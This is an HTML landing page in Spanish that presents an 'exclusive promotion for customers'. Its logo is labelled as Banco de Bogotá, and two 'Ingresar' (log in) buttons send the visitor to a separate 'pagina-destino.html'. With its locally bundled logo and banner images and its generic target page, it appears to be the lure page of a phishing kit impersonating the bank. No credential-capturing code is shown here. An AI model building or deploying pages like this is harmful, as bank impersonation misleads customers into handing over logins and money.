<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Bienvenida a esta promoción exclusiva para Clientes</title>
    <style>
        body {
            margin: 0;
            background-color: #e7e6eb;
        }

        .header {
            width: 100%;
            height: 60px;
            background-color: white;
            display: flex;
            justify-content: space-between;
            align-items: center;
            padding: 0 5px;
        }

        .logo {
            margin-top: 10px;
            margin-left: 15px;
        }

        .menu-container {
            display: flex;
            align-items: center;
            margin-right: 20px;
        }

        .menu-container .btn-ingresar {
            background-color: #0048ba;
            color: white;
            padding: 10px 20px;
            border: none;
            border-radius: 20px;
            cursor: pointer;
            font-size: 16px;
        }

        .menu-container .menu-icon {
            font-size: 18px;
            color: #0048ba;
            cursor: pointer;
        }

        .button {
            font-weight: 600;
            --sherpa-midnight-800: #0040a8;
            --sherpa-white: #fff;
            width: 130px;
            border-radius: 100px;
            cursor: pointer;
            outline: none;
            user-select: none;
            border: solid 1px var(--sherpa-midnight-800);
            background-color: var(--sherpa-midnight-800);
            color: var(--sherpa-white);
            transition: 0.3s;
            height: 48px;
            font-size: 16px;
            font-family: Roboto-Medium, sans-serif;
            position: relative;
            margin-left: -250px;
        }
    </style>
</head>
<body>

<div class="header">
    <div>
        <img class="logo" src="archivo/cas.svg" alt="Logo Banco de Bogotá">
    </div>
    <div class="menu-container">
        <button class="btn-ingresar" onclick="window.location.href='pagina-destino.html'">Ingresar</button>
    </div>
</div>

<center>
    <br><br><br>

    <img style="width: 380px;" src="archivo/titulo.png" alt="">

    <br><br><br>

    <input type="submit" class="button" value="Ingresar" onclick="window.location.href='pagina-destino.html'">

    <br><br><br><br>

    <img width="380px" style="border-radius: 5px; margin-left: 1px;"  src="archivo/das.png" alt="">

</center>

</body>
</html>
